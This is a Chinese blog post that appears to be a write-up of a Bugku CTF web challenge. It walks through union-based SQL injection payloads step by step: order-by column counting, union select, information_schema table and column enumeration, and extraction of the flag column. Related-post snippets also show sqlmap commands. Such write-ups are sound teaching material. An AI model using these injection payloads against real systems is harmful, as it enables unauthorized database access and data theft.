这是一个神奇的对话框

于 2019-09-26 10:54:50 发布
阅读量237 收藏
点赞数 1
分类专栏: bugku
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44598397/article/details/101427476
版权

在这里插入图片描述那就开始寻找注入点吧,输入0’发现还是:
在这里插入图片描述
输入0" 发现报错:
在这里插入图片描述
确定可以注入,判断字段有多少个 0"order by 1,2,3# 发现:
在这里插入图片描述
说明有两列。

输入 0" union select database(),2# ,得到库名:
在这里插入图片描述
继续输入 0" union select table_name,2 from information_schema.tables where table_schema=’bugkusql1’ # (0" union select group_concat(table_name),2 from information_schema.tables where table_schema=database()# )得到表名:

继续输入 0" union select column_name,2 from information_schema.columns where table_name=‘flag1’ # 得到列名:
在这里插入图片描述
继续输入 0" union select flag1,2 from flag1# (爆字段里的内容,中的表明是不加单引号的)得到该列下的值:
在这里插入图片描述
看起来挺像flag的,那么提交一下吧,发现这个真的是flag!!!

版权声明:本文为CSDN博主「A_dmins」的原创文章,遵循CC 4.0 by-sa版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_42967398/article/details/84930265

因为添加的位置主要看回显位置,故2放在from前面。
1、Union两端查询的列数要相同但是2放在前面会出现错误(0" union select 2, column_name from information_schema.columns where table_name=‘flag1’ #)在这里插入图片描述
2、放在后面也会出现错误(0" union select column_name from information_schema.columns where table_name=‘flag1’,2#)在这里插入图片描述

林夕林@
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一个神奇的swing软件Jgoodies
04-01
Swing是Java的一个图形用户界面(GUI)工具包,它扩展了Java Foundation Classes (JFC),提供了丰富的组件和高级功能,使得开发者能够创建美观且功能强大的桌面应用。Jgoodies是由Karsten Lentzsch开发的一系列Java库...
Bugku的web练习题(一)
weixin_43342135的博客
07-19 783
一.web2 1.先打开网站,然后发现网页一片空白,查看源代码后,得到flag,然后提交。 二.计算器 1.然后打开网站后,发现是个输入验证码的事,但是输入的时候,发现了验证码的输入框的长度只有一个数字的长度,然后用控制台打开将maxlength参数修改。 将此处的1修改成2,后更新网页,输入正确的答案,得到flag: 三.web基础$_GET 1.打开网页后,发现提示: 2.用harba...
POST登陆框注入实战(SQLMAP)
烟敛寒林的博客
03-10 1576
利用sqlmap进行POST注入,常见的有三种方法: 注入方式一: 1. 用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下 2. 列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs 注:-r表示加载一个文件,-p指定参数 3. 猜表 选择一个...
bugku---这是一个神奇的登陆框 (burp配合sqlmap实例)
LuckySec
11-29 548
题目 http://123.206.87.240:9001/sql/ 随便输入账号密码,然后打开burp进行拦截,并生成该页面的文件,保存到本地 然后使用sqlmap工具 构造相应语句 首先爆数据库 python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name --dbs ...
bugku 一个神奇的登陆框--POST型SQL注入
a1004070060的博客
06-29 795
解题链接:http://123.206.87.240:9001/sql/ 解题过程: 本题并未给出什么提示,首先考虑到弱口令登录,BP抓包后加载send to intruder,加载字典后爆破无果。然后考虑到之前做的题目,尝试用御剑扫描一下后台,也没发现什么线索,这时才注意到页面的title,原来这道题目与SQL注入相关,考虑到user和pass字段都是通过post方法传递,所以本题应...
bugku----这是一个神奇的登陆框
weixin_43803070的博客
07-07 509
此题是sqlmap+burp结合完成的,打开一看是一个登陆框架,url显示sql,想必是post型的sql注入。 查看注入点: 首先burp抓包,抓到包后选择存到txt文件中:(随便输入账号密码): root@kali:~# sqlmap -r '/root/桌面/2.txt' -p admin_name --dbs// -r是读文件 后面是刚才保存的绝对路径,-p是参数,也就是注入点(选了a...
一个神奇的软件jide
03-30
JIDE,全称为Java IDE(Integrated Development Environment)或Java组件库,是一个强大的开发工具集,旨在帮助程序员更高效地构建Java应用程序,特别是那些基于Swing或JavaFX的桌面应用。 JIDE Common Layer是JIDE...
Automatically-shut-down-MSGBOX.rar_神奇
09-22
这段代码会在屏幕中央弹出一个带有"这是一条消息"文本和"标题"窗口标题的对话框,类型为信息提示。 为了实现自动关闭的MSGBOX,我们需要使用定时器控件(Timer)。在VB中,我们可以添加一个Timer控件到窗体上,并...
excel表格的超级神奇——超级表_excel表格的超级神奇——超级表
09-24
超级表是Excel中的一个增强型工作表,它能够自动扩展以适应新添加的数据,并提供内置的汇总功能。创建超级表后,用户可以轻松地进行排序、筛选、计算以及自定义样式,无需手动调整公式或格式。 2. **创建超级表** ...
电脑各种神奇操作.pdf
10-07
在运行对话框中输入"regedit"打开注册表编辑器,然后按照路径HEKEY——LOCAL——MACHIME/SOFTWARE/microsoft/WINDOWS/CURRENTVERSION/EXPLORER/DESKTOP/NAMESPACE新建一个主键,将其命名为特定的字符串,然后设置其...
bugku 这是一个神奇的登录框
Superpig的博客
11-19 3324
步骤 1、打开题目链接,是一个登录界面,抓包后传数据进行尝试 2、尝试数据 先尝试admin_name=1&admin_passwd=1&submit=GO+GO+GO 得到Try Again! 尝试admin_name=1'&admin_passwd=1&submit=GO+GO+GO 仍然得到Try Again! ,说明 ’ 被过滤了 尝试admin...
bugku-这是一个神奇的登陆框(附代码)(详细)
偷一个月亮
06-20 893
题目链接:http://123.206.87.240:9001/sql/ 数据库 表名 列名 select flag 代码 admin_name=admin" union select database(),database() #&admin_passwd=12345&submit=GO+GO+GO admin_name=admin" union select (s...
源代码-创意互动网站导航(ASP静态版) v1.0.zip
最新发布
08-24
源代码-创意互动网站导航(ASP静态版) v1.0.zip 源代码-创意互动网站导航(ASP静态版) v1.0.zip 源代码-创意互动网站导航(ASP静态版) v1.0.zip 源代码-创意互动网站导航(ASP静态版) v1.0.zip 源代码-创意互动网站导航(ASP静态版) v1.0.zip 源代码-创意互动网站导航(ASP静态版) v1.0.zip 源代码-创意互动网站导航(ASP静态版) v1.0.zip 源代码-创意互动网站导航(ASP静态版) v1.0.zip 源代码-创意互动网站导航(ASP静态版) v1.0.zip
java源码资源很不错的Java计算器java源码资源很不错的Java计算器
08-24
java源码资源很不错的Java计算器java源码资源很不错的Java计算器提取方式是百度网盘分享地址
源代码-补单系统 v1.0.zip
08-24
源代码-补单系统 v1.0.zip
java源码资源网络蚂蚁Java版java源码资源网络蚂蚁Java版
08-24
java源码资源网络蚂蚁Java版java源码资源网络蚂蚁Java版提取方式是百度网盘分享地址
数字万用表使用介绍.mp4
08-24
数字万用表使用介绍.mp4
SAP 客户主数据导入程序模板
08-24
客户主数据导入模板
基于springboot和vue的 闲置图书分享源码 闲置图书分享代码(高分毕设项目源码)
08-24
1. 闲置图书分享代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,java领域创作者,阿里云开发社区乘风者计划专家博主,专注于大学生项目实战开发,文章底部有博主联系方式,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选题大全: https://blog.csdn.net/weixin_45630258/article/details/135901374
Windows键的神奇组合:电脑使用效率提升秘籍
3. Windows键 + E:这是一个常用的快捷方式,可以立即打开资源管理器,方便用户浏览和管理文件。 4. Windows键 + F:此组合键可以打开“查找:所有文件”对话框,但需要注意与F3键的区别,F3通常用于在当前窗口中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值